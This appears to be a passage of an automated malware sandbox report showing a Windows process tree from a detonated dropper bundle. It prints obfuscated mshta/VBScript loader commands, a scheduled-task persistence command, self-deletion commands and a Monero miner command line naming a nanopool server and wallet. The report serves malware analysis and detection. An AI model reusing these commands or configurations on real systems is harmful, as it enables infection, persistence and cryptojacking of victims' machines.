                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 5880 -s 2276
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                PID:5952
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:6128
                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 6128 -s 2232
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                PID:5296
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:4092
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:1704
                                                                                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:6156
                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                          PID:6796
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:4380
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                            PID:6048
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                PID:6524
                                                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                    PID:2516
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                        PID:5132
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:5204
                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                            PID:4316
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu13559beef6a5272.exe
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:3276
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13559beef6a5272.exe
                                                                                                                                                                                                                                                                                Thu13559beef6a5272.exe
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                PID:2520
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6490120.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6490120.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                  PID:5920
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6872999.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6872999.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                  PID:2416
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7127782.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7127782.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4187297.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4187297.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                  PID:4540
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3343953.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3343953.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:5928
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\719524.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\719524.exe"
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:6244
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 296
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                          PID:5932
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2059768.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2059768.exe"
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:5712
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu13045a98310.exe
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:2140
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13045a98310.exe
                                                                                                                                                                                                                                                                                      Thu13045a98310.exe
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      PID:1772
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 300
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:6152
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu133bd09ec4755.exe
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe
                                                                                                                                                                                                                                                                                        Thu133bd09ec4755.exe
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:2852
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe" -u
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:5140
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu13fba7be709523c0e.exe
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:836
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13fba7be709523c0e.exe
                                                                                                                                                                                                                                                                                            Thu13fba7be709523c0e.exe
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:1860
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LIPPQ.tmp\Thu13fba7be709523c0e.tmp
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LIPPQ.tmp\Thu13fba7be709523c0e.tmp" /SL5="$1021C,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13fba7be709523c0e.exe"
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:2796
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Thu131398a3143fefd0.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:1052
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exe
                                                                                                                                                                                                                                                                                              Thu131398a3143fefd0.exe
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              PID:4312
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1892
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                PID:6040
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu132a7b862a0b8c3.exe /mixtwo
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:4960
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a7b862a0b8c3.exe
                                                                                                                                                                                                                                                                                                Thu132a7b862a0b8c3.exe /mixtwo
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                PID:1872
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a7b862a0b8c3.exe
                                                                                                                                                                                                                                                                                                  Thu132a7b862a0b8c3.exe /mixtwo
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:2684
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu132a7b862a0b8c3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a7b862a0b8c3.exe" & exit
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:6088
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                        taskkill /im "Thu132a7b862a0b8c3.exe" /f
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                        PID:1512
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu13ce386e385.exe
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:3060
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe
                                                                                                                                                                                                                                                                                                    Thu13ce386e385.exe
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:1456
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vBscriPt: ClOsE ( cReaTeObJECt ( "WsCRIpT.SHeLl" ). run("cMd /q /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe"" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If """" =="""" for %Y in ( ""C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe"" ) do taskkill -f /iM ""%~nXY"" " , 0, True ) )
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:840
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /q /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If "" =="" for %Y in ( "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13ce386e385.exe" ) do taskkill -f /iM "%~nXY"
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:4704
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE
                                                                                                                                                                                                                                                                                                              ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                PID:5552
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vBscriPt: ClOsE ( cReaTeObJECt ( "WsCRIpT.SHeLl" ). run("cMd /q /R tyPe ""C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE"" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If ""-Pnxy5pXvI8SWjtAt3 "" =="""" for %Y in ( ""C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE"" ) do taskkill -f /iM ""%~nXY"" " , 0, True ) )
                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                    PID:5716
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /R tyPe "C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If "-Pnxy5pXvI8SWjtAt3 " =="" for %Y in ( "C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE" ) do taskkill -f /iM "%~nXY"
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                        PID:5844
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBscrIPt: cLosE ( CreAtEobJECt ( "wScRiPt.Shell" ). rUn ( "C:\Windows\system32\cmd.exe /R eCho | sEt /p = ""MZ"" > kjDH_4NN.HcN & copy /y /B KjDH_4NN.HcN + OCbMK.P + JWTDD.9 ..\YWdLrN.QC & START msiexec -Y ..\YwdlRn.qC & DeL /q * " , 0 , trUE ) )
                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                        PID:72
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /R eCho | sEt /p = "MZ" >kjDH_4NN.HcN & copy /y /B KjDH_4NN.HcN + OCbMK.P + JWTDD.9 ..\YWdLrN.QC & START msiexec -Y ..\YwdlRn.qC& DeL /q *
                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>kjDH_4NN.HcN"
                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                PID:5372
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCho "
                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                  PID:5364
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  msiexec -Y ..\YwdlRn.qC
                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                  PID:4000
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                            taskkill -f /iM "Thu13ce386e385.exe"
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                            PID:5628
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu133afc50de08.exe
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:1276
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133afc50de08.exe
                                                                                                                                                                                                                                                                                                                        Thu133afc50de08.exe
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:3140
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:4548
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                          Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                          PID:4404
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu132a4e95bb26a065.exe
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:5232
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu134eb4d923e.exe
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:3524
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu134eb4d923e.exe
                                                                                                                                                                                                                                                                                                                            Thu134eb4d923e.exe
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:5652
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 300
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                              PID:5936
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Thu138c8768d77029f.exe
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:3312
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe d6fd3dedd822f8a94baad1d7e76fc7ce 1FPS8FyOPkmM3Jgu9Ybc4Q.0.1.0.3.0
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                      PID:2560
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                      PID:3172
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                      PID:2072
                                                                                                                                                                                                                                                                                                                      • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:1864
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe
                                                                                                                                                                                                                                                                                                                        Thu138c8768d77029f.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:1492
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-PO6NO.tmp\Thu138c8768d77029f.tmp
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-PO6NO.tmp\Thu138c8768d77029f.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:2296
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe" /SILENT
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:3756
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-HUPMF.tmp\Thu138c8768d77029f.tmp
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-HUPMF.tmp\Thu138c8768d77029f.tmp" /SL5="$30168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu138c8768d77029f.exe" /SILENT
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              PID:2844
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4312 -ip 4312
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:4380
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
